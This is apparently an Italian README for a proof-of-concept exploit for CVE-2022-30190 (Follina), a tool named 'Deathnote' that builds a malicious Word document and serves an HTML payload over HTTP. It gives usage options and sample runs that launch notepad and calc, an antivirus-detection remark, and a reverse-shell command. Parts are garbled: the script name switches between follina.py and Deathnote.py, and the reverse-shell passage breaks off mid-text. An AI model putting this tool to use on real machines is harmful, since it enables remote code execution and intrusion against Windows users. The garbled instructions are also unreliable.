
Prova di concetto di CVE-2022-30190
Esiste una vulnerabilità di esecuzione di codice in modalità remota quando MSDT viene chiamato utilizzando il protocollo URL da un'applicazione chiamante come Word. Un attaccante che sfrutta con successo questa vulnerabilità può eseguire codice arbitrario con i privilegi dell'applicazione chiamante. L'attaccante può quindi installare programmi, visualizzare, modificare o eliminare dati, o creare nuovi account nel contesto consentito dai diritti dell'utente.
Crea un attacco MS-MSDT "Deathnote" con un documento Microsoft Word malevolo e prepara un payload con un server HTTP.
usage: follina.py [-h] [--command COMMAND] [--output OUTPUT] [--interface INTERFACE] [--port PORT]
options:
-h, --help mostra questo messaggio di aiuto ed esce
--command COMMAND, -c COMMAND
comando da eseguire sul target (default: Notepad)
--output OUTPUT, -o OUTPUT
file maldoc di output (default: ./Deathnote.doc)
--interface INTERFACE, -i INTERFACE
interfaccia di rete o indirizzo IP per ospitare il server HTTP (default: eth0)
--port PORT, -p PORT porta per servire il server HTTP (default: 8000)
Avvia notepad.exe:
$ python3 Deathnote.py
[+] copiato documento di staging /tmp/9mcvbrwo
[+] creato maldoc ./Deathnote.doc
[+] servendo payload html su :8000
Avvia calc.exe:
$ python3 Deathnote.py -c "calc"

C:\Windows\Tasks. Non pulisce il binario. Questo attiverà rilevamenti antivirus a meno che l'AV non sia disabilitato.Ottieni reverse shell :
python3 Deathnote.py -p 1234